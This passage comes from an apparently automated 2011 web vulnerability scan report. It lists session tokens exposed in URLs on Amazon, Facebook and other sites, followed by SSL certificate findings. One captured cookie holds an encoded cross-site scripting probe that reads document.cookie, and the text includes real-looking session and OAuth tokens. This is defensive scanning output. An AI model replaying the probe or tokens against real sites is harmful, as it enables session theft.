http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0C8FAE0A58222B2EF35D388EC6197256843C46BE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=D8A2919B13050E502CCFB68A2497B7FBE4582C58&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=41F556ECB290E80B254EB00D3A227CA897ECD8B0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/RN32EONZRC41F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=455A7397FFB26B5989764534CDD846328D74CD06&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=RN32EONZRC41F.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.18. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=amb_link_354882122_1/187-0383633-5130955?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374
http://www.amazon.com/gp/redirect.html/ref=amb_link_354882122_3/187-0383633-5130955?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_idp_klkrnb0REJWNJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_fa_idp_klkrnb0REJWNJ%26bodytext%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_idp_klkrnb0REJWNJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F1935182374%252Fref%253Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520in%2520Action%2520by%2520Pete%2520Brown%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F1935182374%2Fref%3Dcm_sw_r_tw_idp_klkrnb0REJWNJ%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=dtp_dp_lm_1935182374/187-0383633-5130955?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/187-0383633-5130955?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F8C9C9AFA9C19FFB67AD57626A0687F47E8E5240&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AC599A1662228CD6303621FA2C4E0BCC9EB6A4EF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/R39SJ8ORWHZK1D/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3073CD54A8A1A9D1D6783B890466B8D1B3D33DC6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R39SJ8ORWHZK1D.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8C320C019E16DC7A431A57CAC44E919BBB761E45&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=87EE02430F44D607DF72D1FE05ED8693FC4DC839&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3EP3VAGDZ4Y69/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=84BC4F29EDB193C5AAFBBA4654395CD6249CD7F5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=R3EP3VAGDZ4Y69.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=635F1EAA6A01F39057804214363DC0EC76CA967E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=CE0FE3633AB768F36A17D6FA5EB1E81A1038E5E7&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Helpful.Reviews&voteSessionID=187-0383633-5130955
http://www.amazon.com/gp/voting/cast/Reviews/2115/RFPY1GIZDCCUI/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=30C41A68C0D0C2CDCE56654AE3155FBD450AE952&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTkzNTE4MjM3NC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MTkzNTE4MjM3NA&voteAnchorName=RFPY1GIZDCCUI.2115.Inappropriate.Reviews&voteSessionID=187-0383633-5130955

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.19. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=10150138890205613&app_id=10150138890205613&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1b163a75%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df9d5fb794%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Dfe7ffb01c%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.redacted%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df13f2287ec%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.redacted%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df166fcfba8%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.redacted%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=10150138890205613&app_id=10150138890205613&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1b163a75%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df9d5fb794%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Dfe7ffb01c%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df13f2287ec%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.redacted%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df166fcfba8%26origin%3Dhttp%253A%252F%252Fphotoblog.msnbc.msn.com%252Ffc5f7798%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9d5fb794&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f13f2287ec&origin=http%3A%2F%2Fphotoblog.msnbc.redacted%2Ffc5f7798&relation=parent&transport=postmessage&frame=f9d5fb794
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:19:40 GMT
Content-Length: 0

11.20. http://www.redacted/scp/AuthServiceTwitter.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.redacted
Path:	/scp/AuthServiceTwitter.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en

Request

GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 220

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en">here</a>.</h
...[SNIP]...

11.21. http://www.thespacereview.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.thespacereview.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.apture.com/js/apture.js?siteToken=d0yKxSl

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. SSL certificate previous next
There are 8 instances of this issue:

https://signup.live.com/
https://www.msnfeedback.com/
https://www.newsvine.com/
https://secure.scout.com/
https://secure.shared.live.com/
https://secure.wlxrs.com/
https://security.live.com/
https://twitter.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

12.1. https://signup.live.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://signup.live.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	signup.live.com
Issued by:	Microsoft Secure Server Authority
Valid from:	Thu Oct 21 12:07:36 CDT 2010
Valid to:	Sat Oct 20 12:07:36 CDT 2012

Certificate chain #1

Issued to:	CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:	CN=Microsoft Internet Authority
Valid from:	Wed May 19 17:13:30 CDT 2010
Valid to:	Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:	CN=Microsoft Internet Authority
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Apr 14 13:12:26 CDT 2010
Valid to:	Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.2. https://www.msnfeedback.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.msnfeedback.com
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	CN=www.msnfeedback.com
Issued by:	Microsoft Secure Server Authority
Valid from:	Tue Jan 04 17:50:10 CST 2011
Valid to:	Thu Jan 03 17:50:10 CST 2013

Certificate chain #1

Issued to:	CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:	CN=Microsoft Internet Authority
Valid from:	Wed Apr 09 16:37:54 CDT 2008
Valid to:	Sat Feb 19 12:24:53 CST 2011

Certificate chain #2

Issued to:	CN=Microsoft Internet Authority
Issued by:	GTE CyberTrust Global Root
Valid from:	Tue Feb 19 12:27:02 CST 2008
Valid to:	Sat Feb 19 12:24:53 CST 2011

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.3. https://www.newsvine.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.newsvine.com
Issued by:	Microsoft Secure Server Authority
Valid from:	Thu Jun 24 16:45:01 CDT 2010
Valid to:	Fri Jun 24 16:45:01 CDT 2011

Certificate chain #1

Issued to:	CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:	CN=Microsoft Internet Authority
Valid from:	Wed May 19 17:13:30 CDT 2010
Valid to:	Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:	CN=Microsoft Internet Authority
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Apr 14 13:12:26 CDT 2010
Valid to:	Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

Certificate chain #4

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.4. https://secure.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.scout.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Thu Sep 30 19:00:00 CDT 2010
Valid to:	Mon Oct 10 18:59:59 CDT 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.5. https://secure.shared.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.shared.live.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.shared.live.com,ST=Washington
Issued by:	Akamai Subordinate CA 3
Valid from:	Wed Jul 07 14:00:54 CDT 2010
Valid to:	Thu Jul 07 14:00:54 CDT 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.6. https://secure.wlxrs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.wlxrs.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.wlxrs.com,ST=Washington
Issued by:	Akamai Subordinate CA 3
Valid from:	Tue Jan 25 07:41:40 CST 2011
Valid to:	Wed Jan 25 07:41:40 CST 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

12.7. https://security.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	security.live.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed May 05 19:00:00 CDT 2010
Valid to:	Fri May 06 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.8. https://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	twitter.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Mon Jul 26 19:00:00 CDT 2010
Valid to:	Wed Jul 27 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

